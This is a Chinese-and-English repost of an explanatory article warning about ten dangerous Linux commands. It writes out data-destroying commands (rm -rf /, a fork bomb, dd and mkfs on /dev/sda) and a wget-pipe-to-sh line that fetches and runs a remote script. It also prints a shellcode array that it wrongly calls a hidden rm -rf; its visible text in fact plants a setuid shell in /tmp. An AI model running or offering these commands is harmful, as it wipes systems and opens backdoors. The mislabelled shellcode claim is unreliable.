金御网安

Linux 下最“危险”的命令

发布时间:4年前热度: 474 ℃评论数:
Linux 命令行佷有用、很高效,也很有趣,但有时候也很危险,尤其是在你不确定自己正在做什么时候。

这篇文章将会向你介绍十条命令,但你最好不要“尝试”着去使用。

当然,以下命令通常都是在 root 权限下才能将愚蠢发挥到无可救药;在普通用户身份下,破坏的只是自己的一亩三分地。

1. rm -rf 命令 

rm -rf 命令是删除文件夹及其内容最快的方式之一。

仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。

下列是一些 rm 命令的选项:

  • rm 命令在 Linux 下通常用来删除文件。

  • rm -r 命令递归的删除文件夹,甚至是空的文件夹。

  • rm -f 命令能不经过询问直接删除‘只读文件’。Linux 下删除文件并不在乎该文件是否是只读的,而只是在意其父目录是否有写权限。所以,-f这个参数只是表示不必一个个删除确认,而是一律悄悄删除。另外,原始的 rm 命令其实也是没有删除提示的,只是一般的发行版都会将 rm 通过别名的方式增加-i参数来要求删除确认,而-f则抑制了这个提示。

  • rm -rf / : 强制删除根目录下所有东东。

  • rm -rf * : 强制删除当前目录的所有文件。

  • rm -rf . : 强制删除当前文件夹及其子文件夹。

从现在起,当你要执行 rm -rf 命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建 rm -i 的别名,来预防用‘rm‘命令删除文件时的事故,它会要求你确认每一个删除请求。

译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好你在做什么!译者本人有着血泪的教训啊。

2. :(){:|:&};: 命令

这就是个 fork 炸弹的实例。

具体操作是通过定义一个名为‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

3. 命令 > /dev/sda

这个命令会将某个‘命令‘的输出写到块设备/dev/sda中。

该操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。

4. mv 文件夹 /dev/null

这个命令会移动某个‘文件夹‘到/dev/null

在 Linux 中 /dev/null 或 null 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。

当然,要说明的是这个命令并不能阻止数据恢复软件——所以,真正的彻底毁灭,需要采用专用的软件或者手法来完成。

5. wget http://www.cloudwaf.cc/c.sh -O- | sh

该命令会从一个(也许是)恶意源下载一个脚本并执行。

Wget 命令会下载这个脚本,而 sh 会(无条件的)执行下载下来的脚本。

注意: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。

6. mkfs.ext3 /dev/sda

上列命令会格式化块设备‘sda’,在执行这个命令后你的块设备(硬盘驱动器)会被格式化,直接让你的系统达到不可恢复的阶段。

通常我们不会直接使用/dev/sda这样的设备,除非是作为 raw 设备使用。

一般都需要将 sda 分成类似 sda1、sda2 这样的分区后才使用。当然,无论你使用 sda 还是 sda1,这样对块设备或分区进行 mkfs 都是毁灭性的,上面的数据都会被蒸发了。

7. > file

这个命令常用来清空文件内容或记录命令输出。

不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。

你可能真正想用的是“>>”,即累加新的输出到文件,而不是刷新那个文件。

如果用上列执行时输入错误或无知的输入类似 “> xt.conf” 的命令会覆盖配置文件或其他任何的系统配置文件。

8. ^foo^bar

这个命令用来编辑先前运行的命令而无需重打整个命令。

用 foobar 命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦。

9. dd if=/dev/random of=/dev/sda

这个命令会向块设备 sda 写入随机的垃圾文件从而擦出数据,让你的系统可能陷入混乱和不可恢复的状态。

记得上面说过 mv 到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见,你可以覆写多次。

10. 隐藏命令 

下面的命令其实就是上面第一个命令 (rm -rf)。

这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄,如果在终端里运行下面命令可能会擦除你的根分区。

真正的危险是隐藏起来的,不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。

切记,千万不要编译/运行从未知来源的代码。

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令。如果你想测试它们,请在虚拟机上运行。任何不和谐或数据丢失,由于运行上面的命令导致你的系统崩溃,文章作者Tecmint概不负责。

原文如下:

10 Most Dangerous Commands – You Should Never Execute on Linux

1. rm -rf Command

The rm -rf command is one of the fastest way to delete a folder and its contents. But a little typo or ignorance may result into unrecoverable system damage. The some of options used with rm command are.

  1. rm command in Linux is used to delete files.
  2. rm -r command deletes the folder recursively, even the empty folder.
  3. rm -f command removes ‘Read only File’ without asking.
  4. rm -rf / : Force deletion of everything in root directory.
  5. rm -rf * : Force deletion of everything in current directory/working directory.
  6. rm -rf . : Force deletion of current folder and sub folders.

Hence, be careful when you are executing rm -rf command. To overcome accidental delete of file by ‘rm‘ command, create an alias of ‘rm‘ command as ‘rm -i‘ in “.bashrc” file, it will ask you to confirm every deletion.

2. :(){:|:&};: Command

The above is actually a fork bomb. It operates by defining a function called ‘:‘, which calls itself twice, once in the foreground and once in the background. It keeps on executing again and again till the system freezes.

:(){:|:&};:

3. command > /dev/sda

The above command writes the output of ‘command‘ on the block /dev/sda. The above command writes raw data and all the files on the block will be replaced with raw data, thus resulting in total loss of data on the block.

4. mv folder /dev/null

The above command will move ‘folder‘ to /dev/null. In Linux /dev/null or null device is a special file that discards all the data written to it and reports that write operation succeed.

# mv /home/user/* /dev/null

The above command will move all the contents of a User directory to /dev/null, which literally means everything there was sent to blackhole (null).

5. wget http://malicious_source -O- | sh

The above command will download a script from a malicious source and then execute it. Wget command will download the script and sh will execute the downloaded script.

Note: You should be very much aware of the source from where you are downloading packages and scripts. Only use those scripts/applications which is downloaded from a trusted source.

6. mkfs.ext3 /dev/sda

The above command will format the block ‘sda’ and you would surely be knowing that after execution of the above command your Block (Hard Disk Drive) would be new, BRAND NEW! Without any data, leaving your system into unrecoverable stage.

7. > file

The above command is used to flush the content of file. If the above command is executed with a typo or ignorance like “> xt.conf” will write the configuration file or any other system or configuration file.

8. ^foo^bar

This command, as described in our 10 Lesser Known Linux Commands, is used to edit the previous run command without the need of retyping the whole command again. But this can really be troublesome if you didn’t took the risk of thoroughly checking the change in original command using ^foo^bar command.

9. dd if=/dev/random of=/dev/sda

The above command will wipe out the block sda and write random junk data to the block. Of-course! Your system would be left at inconsistent and unrecoverable stage.

10. Hidden the Command

The below command is nothing but the first command above (rm -rf). Here the codes are hidden in hex so that an ignorant user may be fooled. Running the below code in your terminal will wipe your root partition.

This command here shows that the threat may be hidden and not normally detectable sometimes. You must be aware of what you are doing and what would be the result. Don’t compile/run codes from an unknown source.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Note: Don’t execute any of the above command in your Linux terminal or shell or of your friend or school computer. If you want to test them, run them in virtual machine. Any in-consistence or data loss, due to the execution of above command will break your system down for which, neither the Author of the article nor Tecmint is responsible.

That’s all for now. I will soon be here again with another interesting article you people will love to read. Till then Stay tuned and connected to Tecmint. If you know any other such Dangerous Linux Commands and you would like us to add to the list, please tell us via comment section and don’t forgot to give your value-able feedback.

危险

手机扫码访问